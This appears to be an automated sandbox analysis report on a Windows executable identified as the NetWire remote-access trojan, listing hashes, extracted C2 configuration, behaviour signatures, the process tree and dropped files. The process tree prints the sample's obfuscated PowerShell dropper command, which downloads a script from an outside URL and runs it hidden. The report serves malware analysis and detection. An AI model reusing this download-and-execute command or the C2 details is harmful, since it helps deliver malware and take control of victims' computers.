Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    29-12-2024 23:12

General

  • Target

    A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe

  • Size

    17.7MB

  • MD5

    a5b839089ce5953f0ea149c5d9fa2d7a

  • SHA1

    767b6cea8c1c3f892cc2bf20d1a63e52c0376c39

  • SHA256

    a2ae35821b702b7b0fd434a54afa836e69c20904664ce1ed4d3181ba2b8aa051

  • SHA512

    0df01ca9702f52c8f41809a609d409da6f07f257ae05f6b379378213f1ce18ec00406fc8cc798b7cdf75c63ef763b973f57776bd7ed5d7ccf2457d486a1cdb3e

  • SSDEEP

    393216:iaB19LrFHgq7Pck/UibjnYPj77lYaDnHcqEhgAD:TPFHgKUk//rYPpYGHlqgm

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    https://i.top4top.io/m_1891i29ay1.mp4

Extracted

  • Family
    netwire
  • C2
    alice2019.myftp.biz:3360

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    FRAPPE2021

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 2 IoCs
  • Netwire

    Netwire is a RAT whose main functionality is focused on password stealing and keylogging, but it also includes remote control capabilities.

  • Netwire family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Uses the powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe
    "C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4516
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:388
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB6C.tmp" "c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\CSC83F488A2222F4D8693308119E85DC552.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3704
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2180
    • C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe
      "C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:3436

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe

    Filesize

    18.0MB

    MD5

    8bbbcc401fc4d9834fa52d9cc98f9eef

    SHA1

    1aa753b405587c17852bcc447e39c6880498c5c0

    SHA256

    c74c692354f9fc75e9cadf7c9d00756d40b5e6d100bb321260e2c29f7d13abb9

    SHA512

    f3450fec6f4ae1cf3e22db11f5be2aa681a908de4bdfadcbd7fc0a08640e0c2fb9e40d607155f575cb4727b64f6dbb433fedaec67e117636cfaa6d8fcfd48ada

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    ba9b2b48e4fb6e97813ab1f6b7e40f35

    SHA1

    d95dea723f5d67ece22adbc9ee6870e2347ffe58

    SHA256

    049366620ca23380cc1b3dba652487ca1b4611c646f30d0a6b456eef22d2f401

    SHA512

    df0d6c3989132f25a40559002b9d620fff26f3d0b2bfae175b88fb2edea3d4796335e88da0ee9bd13d1e7b4de4b12b96e1e1c185441d27774b2d314d4bb979b6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    476B

    MD5

    b76376bed8ad47d2d9d8ed74918b398b

    SHA1

    81425c1404c4ed19fb2f03c6e0a535490281cd1f

    SHA256

    59423ae50a9d3b477f9b57b95baa7d9384acdf03c07b1497eeef2e950ccd7804

    SHA512

    9f9b623153471974ce781d66683ddda235beea82f506d54db358638aaac355442048a330ba6381572261102037311a59f8a1e15aab6d0da56865f3420cc21ae2

  • C:\Users\Admin\AppData\Local\Temp\$inst\0002.tmp

    Filesize

    1.5MB

    MD5

    63cbbef120a1f96e3586bffb970f44df

    SHA1

    c354224093c565f009f373fceac05ec89f34c902

    SHA256

    e99f7980cdb90e8365bdd66a1f889ed7c4c8858600861006d9b5d139b90ab020

    SHA512

    8b14df69399e00e384103c9b23d2868191b2e8576b0f24e927e334ca97cc31142d62e333d9776e5bae9e851a53dc6bb910090663abb4fae9b37f0e38a545877a

  • C:\Users\Admin\AppData\Local\Temp\RESDB6C.tmp

    Filesize

    1KB

    MD5

    9bf898b6679dd9a5686526a6407c421c

    SHA1

    2d7cf6355a0308874a22ce51f3290751381c25f6

    SHA256

    8040ed22df2ab86d10e9350494a9e2b8c257ee9c105109622d0994bca67ad8e0

    SHA512

    fbee29fdb686eb8e1604e2acce8f1cd64947b3fde14b9428ce4921e6ca4b805677316dc5fa62db7653b19dbe2995605b8ba3425dcc930e1b72f378553c45b7ff

  • C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1

    Filesize

    232KB

    MD5

    7e9a5c74501529c97a0675dc7d3e36cc

    SHA1

    c090ead740db008ed6bb1832c31065911103e349

    SHA256

    c4facee5b8bdcb71ad41e600c454bb96a26fb4ab0888285e7182be1ed997b157

    SHA512

    81dfac6d2c9ff07078c4dd356b820c4479683f65f8610be5b010f012183141775d8b5e035f8f34e95cd28f4fd969db5abb3f00d410434d5900c7dba5fcda6716

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sccelnx5.qez.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.dll

    Filesize

    13KB

    MD5

    e4e71130076a57121244348fb132704f

    SHA1

    ce698afe1eb6d9566e311d7483b43bb57ecb28ee

    SHA256

    4f0000b706b784c6a03bb320ef28ec7517e1e5aeb390735c6c606fb1bc4ef5b5

    SHA512

    4487fdefc6a78cae532fc67593ae7c8ff9f946cabeaff68b73689588b455b6495d14c7f38947dc1a24ef1f49294f9547953e90f1d0fec91f9f8f493c6d8b62a4

  • C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs

    Filesize

    153KB

    MD5

    2591c7f4c1ebca785ccb7c074f66782a

    SHA1

    080fa10f63666f48ed0136eb6dfbe5b914292668

    SHA256

    d87330ce060e28593a0a7eb54b4191f83afed4772e63f6330d0be7312c02f5ec

    SHA512

    658e9d852a73bf2a2fa72e1d553958657a0abd32451c45477ba80dd16be4946c1f84c9d40cfb7a955b534f76c7bd0ec106400c53a62fcbb2b3d5401cdc4d44d6

  • \??\c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\CSC83F488A2222F4D8693308119E85DC552.TMP

    Filesize

    652B

    MD5

    b7ac28a6c17c32b509a5458e1cb8e5e4

    SHA1

    a9de9ce5d0a128da4eb3233bc91349e8f421ad47

    SHA256

    2ef3c7012a138196ef57435928525c79f475fd594c407aa38c827da241ab3c95

    SHA512

    093438d4b7c40ff8b25a357b57bec4f5c3eeb9211b60047d993847cce439f4a659d54f85d0343bf0a8fe7bec843effbc2c560c959c084f36f3f5a0935fe99341

  • \??\c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.0.cs

    Filesize

    13KB

    MD5

    e03b1e7ba7f1a53a7e10c0fd9049f437

    SHA1

    3bb851a42717eeb588eb7deadfcd04c571c15f41

    SHA256

    3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

    SHA512

    a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

  • \??\c:\Users\Admin\AppData\Local\Temp\kzbf1pc1\kzbf1pc1.cmdline

    Filesize

    327B

    MD5

    fc221f9d940652322cbd180766139516

    SHA1

    b191611ef224d0029cb3f1710f3a1856251b597d

    SHA256

    7c8f12df9e0fb4709f9157e9ce02b79dae285233642762ab63d2768315790762

    SHA512

    436e4f8b3eb532eba28bcb6037520e03765605697ec6d107fdb9fef27efeb12337a4adc936acc385ba5c05d91bec437639b50f79e54abaeb9b622e32a37eb86f

  • memory/1300-48-0x0000000004CD0000-0x0000000004CF2000-memory.dmp

    Filesize

    136KB

  • memory/1300-60-0x00000000057B0000-0x0000000005B04000-memory.dmp

    Filesize

    3.3MB

  • memory/1300-62-0x0000000005CC0000-0x0000000005D0C000-memory.dmp

    Filesize

    304KB

  • memory/1300-63-0x00000000074E0000-0x0000000007B5A000-memory.dmp

    Filesize

    6.5MB

  • memory/1300-64-0x0000000006190000-0x00000000061AA000-memory.dmp

    Filesize

    104KB

  • memory/1300-65-0x0000000006D20000-0x0000000006DBC000-memory.dmp

    Filesize

    624KB

  • memory/1300-61-0x0000000005C70000-0x0000000005C8E000-memory.dmp

    Filesize

    120KB

  • memory/1300-68-0x00000000728EE000-0x00000000728EF000-memory.dmp

    Filesize

    4KB

  • memory/1300-69-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

  • memory/1300-40-0x0000000002350000-0x0000000002386000-memory.dmp

    Filesize

    216KB

  • memory/1300-106-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

  • memory/1300-38-0x00000000728EE000-0x00000000728EF000-memory.dmp

    Filesize

    4KB

  • memory/1300-49-0x00000000055D0000-0x0000000005636000-memory.dmp

    Filesize

    408KB

  • memory/1300-50-0x0000000005640000-0x00000000056A6000-memory.dmp

    Filesize

    408KB

  • memory/1300-43-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

  • memory/1300-41-0x00000000728E0000-0x0000000073090000-memory.dmp

    Filesize

    7.7MB

  • memory/1300-42-0x0000000004FA0000-0x00000000055C8000-memory.dmp

    Filesize

    6.2MB

  • memory/2180-100-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

  • memory/2180-99-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

  • memory/4000-67-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/4516-97-0x00000000072C0000-0x00000000072CA000-memory.dmp

    Filesize

    40KB

  • memory/4516-81-0x0000000007430000-0x00000000074A6000-memory.dmp

    Filesize

    472KB

  • memory/4516-80-0x0000000007FC0000-0x0000000008564000-memory.dmp

    Filesize

    5.6MB